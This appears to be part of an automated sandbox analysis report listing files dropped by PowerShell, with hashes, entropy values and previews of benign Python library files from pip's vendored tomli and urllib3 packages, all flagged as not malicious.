                                                                                                                                                                                                            MD5:665E0DADFF31440B1F69E26227DD3087
                                                                                                                                                                                                            SHA1:0A3A159FA2DF0D58638600615C32522F5A16E9C1
                                                                                                                                                                                                            SHA-256:9C22BC238B843EB9521A78C6AA99E267BE932A3751EBBBCED51E1054DE3DFADA
                                                                                                                                                                                                            SHA-512:A4C190F8CFABAE30A82C8BEBDD8B464F430A39644E970A95D617B9D9338A30082C0724F98D6A3C0CBD34C853E36DF8D7661A33B4F55C1F0687F93F58BB52155F
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:o..........g.........................@...s6...d.d.l.m.Z.m.Z.m.Z...e.e.g.e.f...Z.e.e.d.f...Z.e.Z.d.S.)......)...Any..Callable..Tuple.N)...typingr....r....r......str..ParseFloat..Key..int..Pos..r....r.....oC:\Users\Administrator\AppData\Local\Programs\Python\Python310-32\Lib\site-packages\pip/_vendor/tomli/_types.py..<module>....s............
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:Python script, ASCII text executable
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):22633
                                                                                                                                                                                                            Entropy (8bit):4.67342712908563
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:384:e71Y6S2ekJKFeaft8j97n2pxPTq+tcTngIrHv8vMuUQZBj4iwkk8:eJY6SNkJKFnl8j9vwEgIrHEvMuU+Bj4Q
                                                                                                                                                                                                            MD5:F67CD21BFA4C3AFF92F17E6D06373CCC
                                                                                                                                                                                                            SHA1:C21682D8065B4C6319654107C4D1691000551A96
                                                                                                                                                                                                            SHA-256:83DF8435A00B4BE07C768918A42BB35056A55A5A20ED3F922183232D9496AED3
                                                                                                                                                                                                            SHA-512:37EFE1A5E34AA9F8A7D09588DC9C5BA1F86AF035DCA297A375F0D0485F9ED14DCFECF0EF47B3B6817639A813B0E37BA78B140728342FF66D2BB7E899A3F52A9E
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:# SPDX-License-Identifier: MIT.# SPDX-FileCopyrightText: 2021 Taneli Hukkinen.# Licensed to PSF under a Contributor Agreement...from __future__ import annotations..from collections.abc import Iterable.import string.from types import MappingProxyType.from typing import Any, BinaryIO, NamedTuple..from ._re import (. RE_DATETIME,. RE_LOCALTIME,. RE_NUMBER,. match_to_datetime,. match_to_localtime,. match_to_number,.).from ._types import Key, ParseFloat, Pos..ASCII_CTRL = frozenset(chr(i) for i in range(32)) | frozenset(chr(127))..# Neither of these sets include quotation mark or backslash. They are.# currently handled as separate cases in the parser functions..ILLEGAL_BASIC_STR_CHARS = ASCII_CTRL - frozenset("\t").ILLEGAL_MULTILINE_BASIC_STR_CHARS = ASCII_CTRL - frozenset("\t\n")..ILLEGAL_LITERAL_STR_CHARS = ILLEGAL_BASIC_STR_CHARS.ILLEGAL_MULTILINE_LITERAL_STR_CHARS = ILLEGAL_MULTILINE_BASIC_STR_CHARS..ILLEGAL_COMMENT_CHARS = ILLEGAL_BASIC_STR_CHARS..TOML_WS = frozenset(
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:Python script, ASCII text executable
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):2943
                                                                                                                                                                                                            Entropy (8bit):4.97581664014055
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:48:8qJnOFJmPEwYUvke+Sq/RAHtvtTcP3dCmUdtVHDo7fXWq4NcPEY:fowfvke3AMtVqcz6IcPt
                                                                                                                                                                                                            MD5:0111DF35A25A503E0247F50838D35AEA
                                                                                                                                                                                                            SHA1:41D8D0205AE11DA5308581E62DF6DA123BE415ED
                                                                                                                                                                                                            SHA-256:75B8E0E428594F6DCA6BDCFD0C73977DDB52A4FC147DD80C5E78FC34EA25CBEC
                                                                                                                                                                                                            SHA-512:CD58581A287C723F687CDB08646EF7453CCAB59E73145F1367119D6BEB61DFDCC6F97C6186112D849E37FD31EB6750EC20BEF3795E57729A0306E537D9216907
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:# SPDX-License-Identifier: MIT.# SPDX-FileCopyrightText: 2021 Taneli Hukkinen.# Licensed to PSF under a Contributor Agreement...from __future__ import annotations..from datetime import date, datetime, time, timedelta, timezone, tzinfo.from functools import lru_cache.import re.from typing import Any..from ._types import ParseFloat..# E.g..# - 00:32:00.999999.# - 00:32:00._TIME_RE_STR = r"([01][0-9]|2[0-3]):([0-5][0-9]):([0-5][0-9])(?:\.([0-9]{1,6})[0-9]*)?"..RE_NUMBER = re.compile(. r""".0.(?:. x[0-9A-Fa-f](?:_?[0-9A-Fa-f])* # hex. |. b[01](?:_?[01])* # bin. |. o[0-7](?:_?[0-7])* # oct.).|.[+-]?(?:0|[1-9](?:_?[0-9])*) # dec, integer part.(?P<floatpart>. (?:\.[0-9](?:_?[0-9])*)? # optional fractional part. (?:[eE][+-]?[0-9](?:_?[0-9])*)? # optional exponent part.).""",. flags=re.VERBOSE,.).RE_LOCALTIME = re.compile(_TIME_RE_STR).RE_DATETIME = re.compile(. rf""".([0-9]{{4}})-(0[1-9]|1[0-2])-(0[1-9]|[12][0-9]|3[
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:Python script, ASCII text executable
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):254
                                                                                                                                                                                                            Entropy (8bit):4.976783622352379
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:6:SAgLRatxp89TQSnGDEYBFpkoL+RBZuCw+mkILmt:5O+xp89TQSnGDEYBpnLyILmt
                                                                                                                                                                                                            MD5:19A32B713392E66BAC544E73F025B2CB
                                                                                                                                                                                                            SHA1:6DC6337D888EDEA5138A094E517BE6C0E4BD09F4
                                                                                                                                                                                                            SHA-256:F864C6D9552A929C7032ACE654EE05EF26CA75D21B027B801D77E65907138B74
                                                                                                                                                                                                            SHA-512:C3D610738DC0E26F5645C200C6D1BD121642C5C2E71A2A235A702C2F5902E5CBE641016B6B79B1947E327B92216DEDB40947D4247BB8913B138BE0A440C0C28A
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:# SPDX-License-Identifier: MIT.# SPDX-FileCopyrightText: 2021 Taneli Hukkinen.# Licensed to PSF under a Contributor Agreement...from typing import Any, Callable, Tuple..# Type annotations.ParseFloat = Callable[[str], Any].Key = Tuple[str, ...].Pos = int.
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:Python script, ASCII text executable
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):80114
                                                                                                                                                                                                            Entropy (8bit):4.428503776495321
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:1536:g/SDPFEwcLm5l5nhL6FErWwCaVsws3A2b9nABDAEid/7eNcq:g/SbaHLm5lPL6FErWwCm5s3A5BDAEC/0
                                                                                                                                                                                                            MD5:F5F6C0541326DD08F0F6074E7D9A09CD
                                                                                                                                                                                                            SHA1:C086DD65923190C49907759BB36326F91A58D345
                                                                                                                                                                                                            SHA-256:54A67F9C7B2ECC36CA395518D824DD6AFC0181F67611747296E64747351801B8
                                                                                                                                                                                                            SHA-512:48FEBB49B3BA0B5B12D5DEB87B713DAB74479A485392D8489FA91AA988260139BE1916E9D735AFDE5F10BB1827DE893D606A3ECEAECCDEEBB4963B0445F50B9A
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:import abc.import collections.import collections.abc.import functools.import operator.import sys.import types as _types.import typing...__all__ = [. # Super-special typing primitives.. 'Any',. 'ClassVar',. 'Concatenate',. 'Final',. 'LiteralString',. 'ParamSpec',. 'ParamSpecArgs',. 'ParamSpecKwargs',. 'Self',. 'Type',. 'TypeVar',. 'TypeVarTuple',. 'Unpack',.. # ABCs (from collections.abc).. 'Awaitable',. 'AsyncIterator',. 'AsyncIterable',. 'Coroutine',. 'AsyncGenerator',. 'AsyncContextManager',. 'ChainMap',.. # Concrete collection types.. 'ContextManager',. 'Counter',. 'Deque',. 'DefaultDict',. 'NamedTuple',. 'OrderedDict',. 'TypedDict',.. # Structural checks, a.k.a. protocols.. 'SupportsIndex',.. # One-off things.. 'Annotated',. 'assert_never',. 'assert_type',. 'clear_overloads',. 'dataclass_transform',. 'get_overloads',. 'final',. 'get_args',. 'get_origin',.
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:Python script, ASCII text executable
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):20070
                                                                                                                                                                                                            Entropy (8bit):4.482993230607857
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:384:gKTqvc0xKFJCt4qk6z1XgWcFxEbA8CBW8:uLxKFot4qHVg8o
                                                                                                                                                                                                            MD5:0F032DA133D684CB4705645716F409E2
                                                                                                                                                                                                            SHA1:BE11F784F89532CBDA80ABE92B883C2197D0765E
                                                                                                                                                                                                            SHA-256:F3DEFAC0BEAC19E54C5B42675EFC79983D34C97BBCEEE423C6D07DFD52FC771F
                                                                                                                                                                                                            SHA-512:7279A5849A6C6DA3410CD35314988112ED48BB2407CD9B20A431ABCB8CF26A44316E9A6DD9BB3AF37343C39D3115CD51D75C1F52AE0F4A18B46BEEEB4BF7FD47
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:from __future__ import absolute_import..import datetime.import logging.import os.import re.import socket.import warnings.from socket import error as SocketError.from socket import timeout as SocketTimeout..from .packages import six.from .packages.six.moves.http_client import HTTPConnection as _HTTPConnection.from .packages.six.moves.http_client import HTTPException # noqa: F401.from .util.proxy import create_proxy_ssl_context..try: # Compiled with SSL?. import ssl.. BaseSSLError = ssl.SSLError.except (ImportError, AttributeError): # Platform-specific: No SSL.. ssl = None.. class BaseSSLError(BaseException):. pass...try:. # Python 3: not a no-op, we're adding this to the namespace so it can be imported.. ConnectionError = ConnectionError.except NameError:. # Python 2. class ConnectionError(Exception):. pass...try: # Python 3:. # Not a no-op, we're adding this to the namespace so it can be imported.. BrokenPipeError = BrokenPipeError.except
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:Python script, ASCII text executable
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):39095
                                                                                                                                                                                                            Entropy (8bit):4.302561760790372
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:768:6vYeQ2AWEsVQZDVAT/35nM2m10mhQYUguRRyKFmY7:6vNQ2Asm5AT/xHeu7FFmY7
                                                                                                                                                                                                            MD5:1E13AD2414EB9BF0053BA68AC7938213
                                                                                                                                                                                                            SHA1:5A5D046A2A60B1160AD445610FD1929425200D77
                                                                                                                                                                                                            SHA-256:BD2E146872E847DFF96862D7490EFBEB2FE34F182AAA3C7462C8E4624B1618EA
                                                                                                                                                                                                            SHA-512:DAF068FC29B3D447C4188E73F562D4C70D2E0F07259E73FC40DD148C61A9EE8DE5B8050BCDEC162E85B36F3BC481DAB9208AE88F11987EA4B6C9497E0702F93E
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:from __future__ import absolute_import..import errno.import logging.import re.import socket.import sys.import warnings.from socket import error as SocketError.from socket import timeout as SocketTimeout..from .connection import (. BaseSSLError,. BrokenPipeError,. DummyConnection,. HTTPConnection,. HTTPException,. HTTPSConnection,. VerifiedHTTPSConnection,. port_by_scheme,.).from .exceptions import (. ClosedPoolError,. EmptyPoolError,. HeaderParsingError,. HostChangedError,. InsecureRequestWarning,. LocationValueError,. MaxRetryError,. NewConnectionError,. ProtocolError,. ProxyError,. ReadTimeoutError,. SSLError,. TimeoutError,.).from .packages import six.from .packages.six.moves import queue.from .request import RequestMethods.from .response import HTTPResponse.from .util.connection import is_connection_dropped.from .util.proxy import connection_requires_http_tunnel.from .util.queue import LifoQueue.from .util.request impor
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):216
                                                                                                                                                                                                            Entropy (8bit):4.809546138474821
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:6:y/Qx/qeh/wz8u95/n23d6xUAreaeHuPD4:CQx/qeJwz8g/2IsaPD4
                                                                                                                                                                                                            MD5:86915D4B0658A49049F8FB8C16CAD816
                                                                                                                                                                                                            SHA1:DC8D0735BAB9EF586BCF38451C665F76BE294C0E
                                                                                                                                                                                                            SHA-256:07A035228E33D0E4688A2DA5DB2A6D47EADC02F1C7FC550137C95CFE5D255F94
                                                                                                                                                                                                            SHA-512:5A68E71447079BC8515A69C91F112BDA7C92AFB6FB11ADF337F329E050FF3A2180D71A88C0C7D485143AFFC6EBB30CF1B6A4AECF73A7CC7DD3D990CD3DC44395
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:o..........g.........................@...s....d.S.).N..r....r....r.....{C:\Users\Administrator\AppData\Local\Programs\Python\Python310-32\Lib\site-packages\pip/_vendor/urllib3/contrib/__init__.py..<module>....s......
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):1396
                                                                                                                                                                                                            Entropy (8bit):4.9928438116421585
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:24:9kelGelUrtk5ML+/rX2L+IvcXKInc1mOQny9UOPTzgxwrMXEUMTBXO1ikJplLLLU:9kvRsS+z2qIvXIQoym2T8xyMXEbBXO0T
                                                                                                                                                                                                            MD5:CDDD12CA79EBF6398C55A0AB0DDF6100
                                                                                                                                                                                                            SHA1:7ABE26573B5E2336C4A770B7D34DC5BB94FA95DF
                                                                                                                                                                                                            SHA-256:9900A776E930DE43A21B30982973274A58F45F16F1F205496A0B533AEDD14BC3
                                                                                                                                                                                                            SHA-512:B6AFE73FE82822F4148919523264885B2436311CD799CC7085D88D06AE90C36FA2EE7A6B106DF94077ED65CFFE6FDD4FAC99E7BA8D1CFEC267F51D1B7D0077BF
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:o..........g.........................@...s8...d.Z.d.d.l.Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.S.).zB.This module provides means to detect the App Engine environment.......Nc....................C...s....t...p.t...S.).N)...is_local_appengine..is_prod_appengine..r....r......C:\Users\Administrator\AppData\Local\Programs\Python\Python310-32\Lib\site-packages\pip/_vendor/urllib3/contrib/_appengine_environ.py..is_appengine....s......r....c....................C...s....t...o.t.j.d...d.k.S.).a#...Reports if the app is running in the first generation sandbox... The second generation runtimes are technically still in a sandbox, but it. is much less restrictive, so generally you shouldn't need to check for it.. see https://cloud.google.com/appengine/docs/standard/runtimes. ..APPENGINE_RUNTIME..python27).r......os..environr....r....r....r......is_appengine_sandbox....s......r....c....................C........d.t.j.v.o.t.j...d.d.....d...S.).Nr......SERVER_SOFTWARE..z.Development/..r
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):8213
                                                                                                                                                                                                            Entropy (8bit):5.639091386253491
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:192:aCvaftKwfPQEVE7U/6iqsk/LpQ1z+Vx65CJ+gjn:x4tKwAEKNiZk/LpQ1sAgjn
                                                                                                                                                                                                            MD5:316C7A5732B4F5B00E2F1E1DA61E4099
                                                                                                                                                                                                            SHA1:3DE77A4A09B3A2BDA7EDB6EA7654F46774CDE1BA
                                                                                                                                                                                                            SHA-256:76AFE5ABB8950CD3354CF8B22C561F0FAC05E8B4C49413FF77E4CF1B77F8CBCC
                                                                                                                                                                                                            SHA-512:3952DB553182EFF21520CB465C1E36760A2F4E3A060FBD73451DC89BF646D63355FD5FD416DDCAC0D1C31CAD12A77B4D698B375E74F400798B2FCF6193F9735C
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:o..........g.+.......................@...s....d.Z.d.d.l.m.Z...d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...z.d.d.l.m.Z...W.n...e.y[......d.Z.Y.n.w.e...e...Z.G.d.d...d.e...Z.G.d.d...d.e...Z G.d.d...d.e...Z!e.j"Z"e.j#Z#e.j$Z$e.j%Z%e.j&Z&d.S.).a[....This module provides a pool manager that uses Google App Engine's.`URLFetch Service <https://cloud.google.com/appengine/docs/python/urlfetch>`_...Example usage::.. from pip._vendor.urllib3 import PoolManager. from pip._vendor.urllib3.contrib.appengine import AppEngineManager, is_appengine_sandbox.. if is_appengine_sandbox():. # AppEngineManager uses AppEngine's URLFetch API behind the scenes. http = AppEngineManager(). else:. # PoolManager uses a socket-level API behind the scenes. http = PoolManager().. r = http.request('GET', 'https://google.com/')..There are `limitations <https://cloud.google.com/appengine/docs/pytho
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):3640
                                                                                                                                                                                                            Entropy (8bit):5.699063982335338
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:96:99C1T6aeJQMLoK7V7PqaT05FICrH53EsO9auYn:LJfoMFxsFtrHhn
                                                                                                                                                                                                            MD5:31DFE82E7E946E1CD9E72F3C6CFAA66A
                                                                                                                                                                                                            SHA1:7034F6BC416651CC2115E46AF303168153CF085C
                                                                                                                                                                                                            SHA-256:B066726AF25E9CF3C8BBF03F031F7279155C4D422EC9061C7ED117A7576D95E5
                                                                                                                                                                                                            SHA-512:1FCA2CC5BDE86E228E7C79D920A761644D9C4E04EF17B2E2046011DA9B3F2A2E82B7D9053A69DE8245436F70E6036D9507E7192FB0A22194A3F1C0C40E2B2A13
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:o..........g.........................@...sp...d.Z.d.d.l.m.Z...d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...e...d.e.....e.e...Z.G.d.d...d.e...Z.d.S.).z..NTLM authenticating pool, contributed by erikcederstran..Issue #10, see: http://code.google.com/p/urllib3/issues/detail?id=10......)...absolute_importN)...getLogger)...ntlm.....)...HTTPSConnectionPool)...HTTPSConnectiona#...The 'urllib3.contrib.ntlmpool' module is deprecated and will be removed in urllib3 v2.0 release, urllib3 is not able to support it properly due to reasons listed in issue: https://github.com/urllib3/urllib3/issues/2282. If you are a user of this module please comment in the mentioned issue.c........................sD...e.Z.d.Z.d.Z.d.Z...f.d.d...Z.d.d...Z...........d...f.d.d...Z.....Z.S.)...NTLMConnectionPoolzQ. Implements an NTLM authentication version of an urllib3 connection pool. ..httpsc........................sP...t.t.|...j.|.i.|.......|.|._.|.|._.|...d.d...}.|.d.......|._.|.d...|._.|.|._.d.S.).
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):15826
                                                                                                                                                                                                            Entropy (8bit):5.51566076014502
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:384:5vNCkuuErzhpZ2drgr6tqwJMfIGMmENYc1CPgd6L3RvlHmt3EP4EQz2:/Suc1cuIqwJMfIGMmENX1CPgd6L3RZmA
                                                                                                                                                                                                            MD5:9DB42EF53EE030D1C0E1B3A9BF31A55D
                                                                                                                                                                                                            SHA1:2D7598A0449B3564AA6E6F7DD90F8736C067F209
                                                                                                                                                                                                            SHA-256:B49894B14C4E3052C6A4E797FCD4F618ECC75E6B03FD8E947F206093C3869353
                                                                                                                                                                                                            SHA-512:09F568BBA918D70CEBA051CFCB5730656EF8F2D91BC86A163910B0E7C18C23984A87CDD16FF827ADEC685C79E2331CECEEF8F5451A20AB69552BBEBE0CFC1B76
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:o..........g.B.......................@...s|...d.Z.d.d.l.m.Z...d.d.l.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z...z.d.d.l.m.Z...W.n...e.y5......G.d.d...d.e...Z.Y.n.w.d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...z.d.d.l.m.Z...W.n...e.ya......d.Z.d.d.l.m.Z...Y.n.w.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z...d.d.l m!Z!..e.j"d.e#d.d.....d.d.g.Z$d.Z%e.j&e.j'j(e!e.j'j(e.j)e.j'j*i.Z+e,e.d...r.e,e.j'd...r.e.j'j-e+e.j.<.e,e.d...r.e,e.j'd...r.e.j'j/e+e.j0<.e,e.d...r.e,e.j'd...r.e.j'j1e+e.j2<.e.j3e.j'j4e.j5e.j'j6e.j7e.j'j6e.j'j8..i.Z9e:d.d...e9.;..D.....Z<d.Z=e.j%Z>e.j?j@ZAe..BeC..ZDd d...ZEd!d...ZFd"d#..ZGd$d%..ZHd&d'..ZIG.d(d)..d)eJ..ZKe...r+d1d+d,..ZLn.e.ZLeLeK_LG.d-d...d.eJ..ZMd/d0..ZNd.S.)2a.....TLS with SNI_-support for Python 2. Follow these instructions if you would.like to verify TLS certificates in Python 2. Note, the default libraries do.*not* do certificate checking; you need to do additional work to validate.certificates yourself...This needs the following packages installed:..* `pyOpenSSL`_
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):21958
                                                                                                                                                                                                            Entropy (8bit):5.660751076384381
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:384:kYRi8YIkKLyABXBTvif2bT53IOR0Ni18ms9XEWOa7MnhlxBLJCvy4l/DPik7AySq:kYIIrL3BXBzif2bT53FR0e8V9XEWOa7R
                                                                                                                                                                                                            MD5:49FC971A046765CD840903574A0BEFAF
                                                                                                                                                                                                            SHA1:FA5DEA767158B09AE1FA192E7134876AC514AE80
                                                                                                                                                                                                            SHA-256:92F0D86E42C7F5BF31BEC3DB72AE63C350BC3FA3F925457BAE811AD732F7DDDB
                                                                                                                                                                                                            SHA-512:B07F4268E810F52CA690857ECA2EB6CDCCEB33537892F148A8723A5CA938A66D768240E5C96F17853D86861B751B4B469BD3669114DA9453B2F3F0904A40A1FE
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:o..........g.........................@...s....d.Z.d.d.l.m.Z...d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z.m.Z...d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z...z.d.d.l.m.Z...W.n...e yu......d.Z.d.d.l!m"Z"..Y.n.w.d.d.g.Z#d.Z$e.j$Z%e.j&j'Z(e..)..Z*e..+..Z,d.Z-e.j.e.j/e.j0e.j1e.j2e.j3e.j4e.j5e.j6e.j7e.j8e.j9e.j:e.j;e.j<e.j=e.j>e.j?e.j@e.jAe.jBe.jCe.jDe.jEe.jFe.jGe.jHe.jIe.jJe.jKg.ZLe.jMe.jNe.jOf.e.e.jNe.jOf.i.ZPeQe.d...r.e.jRe.jRf.ePe.jS<.eQe.d...r.e.jTe.jTf.ePe.jU<.eQe.d.....r.e.jNe.jNf.ePe.jV<.eQe.d.....r.e.jWe.jWf.ePe.jX<.eQe.d.....r#e.jOe.jOf.ePe.jY<.d.d...ZZd.d...Z[d.d...Z\d.d...Z]e..^e\..Z_e..`e]..ZaG.d.d...d.eb..Zce...rNd%d.d ..Zdn.d&d"d ..Zdedec_dG.d#d$..d$eb..Zed.S.)'a.....SecureTranport support for urllib3 via ctypes...This makes platform-native TLS available to urllib3 users on macOS without the.use of a compiler. This is an important feature because the Python Package.Index is moving to become a TLSv1.2-or-h
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):5618
                                                                                                                                                                                                            Entropy (8bit):5.658971157889103
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:96:9GsPzmojUEqYHSBNt/tnoE8/ZJxdjEIxq7SMumr:vPzmVEq/XGZJjrAr
                                                                                                                                                                                                            MD5:360AB4828DD8C6DEE6C7F8EAA5E92480
                                                                                                                                                                                                            SHA1:AEFD0FC8FEECF4CDD37DB10BC387E27CA62D20B9
                                                                                                                                                                                                            SHA-256:D3239201FB566B61F1B802B2211A8A5859F11AAD19BB99E239614342CC68AC2A
                                                                                                                                                                                                            SHA-512:625CAC81ADFA2BA0606B81714F5452642551139CEA8A54E0631FA59B788878822B2ED890E218C6F3FFF928DE6778614E00DB76227492918A6D50058EB3B8F3FC
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:o..........g.........................@...s(...d.Z.d.d.l.m.Z...z.d.d.l.Z.W.n...e.y&......d.d.l.Z.d.d.l.m.Z...e...d.e.......w.d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z...d.d.l.m.Z.m.Z...d.d.l.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z...z.d.d.l.Z.W.n...e.yh......d.Z.Y.n.w.G.d.d...d.e...Z.G.d.d...d.e.e...Z.G.d.d...d.e...Z.G.d.d...d.e...Z.G.d.d...d.e...Z.d.S.).a.....This module contains provisional support for SOCKS proxies from within.urllib3. This module supports SOCKS4, SOCKS4A (an extension of SOCKS4), and.SOCKS5. To enable its functionality, either install PySocks or install this.module with the ``socks`` extra...The SOCKS implementation supports the full range of urllib3 features. It also.supports the following SOCKS features:..- SOCKS4A (``proxy_url='socks4a://...``).- SOCKS4 (``proxy_url='socks4://...``).- SOCKS5 with remote DNS (``proxy_url='socks5h://...``).- SOCKS5 with local DNS (``proxy_url='socks5://...``).- Usernames and passwords for the SOCKS proxy.... note::. It is recommended to use
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:Python script, ASCII text executable
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):957
                                                                                                                                                                                                            Entropy (8bit):4.839567597088071
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:24:YelUQejhWpWovLFwInc1mOQny9FWvBnNI9hTLRKMLvLhTLRKMoBvLtaXP:AQejhWpvFwIQoynWvBu9hTk2hTk7pUXP
                                                                                                                                                                                                            MD5:ACC1A179E0EC7E6C78DDF8CA298AB6C2
                                                                                                                                                                                                            SHA1:C4CCCEC3D49682BA148AEEB6EBC8C9DC450C6A3C
                                                                                                                                                                                                            SHA-256:6C36F2384856D8228B25C42A00A032AC41CDF9A925B321C52AAEAF17C645B269
                                                                                                                                                                                                            SHA-512:A524C5CC746DA680F51071ECF610AAEF3AA4A58E169786C28B27D9961925461729357BE180D2D95ACC0E5B2C2456DD5D4DCE9276CC856717B5F478C9290C4732
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:""".This module provides means to detect the App Engine environment.."""..import os...def is_appengine():. return is_local_appengine() or is_prod_appengine()...def is_appengine_sandbox():. """Reports if the app is running in the first generation sandbox... The second generation runtimes are technically still in a sandbox, but it. is much less restrictive, so generally you shouldn't need to check for it.. see https://cloud.google.com/appengine/docs/standard/runtimes. """. return is_appengine() and os.environ["APPENGINE_RUNTIME"] == "python27"...def is_local_appengine():. return "APPENGINE_RUNTIME" in os.environ and os.environ.get(. "SERVER_SOFTWARE", "". ).startswith("Development/")...def is_prod_appengine():. return "APPENGINE_RUNTIME" in os.environ and os.environ.get(. "SERVER_SOFTWARE", "". ).startswith("Google App Engine/")...def is_prod_appengine_mvms():. """Deprecated.""". return False.
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
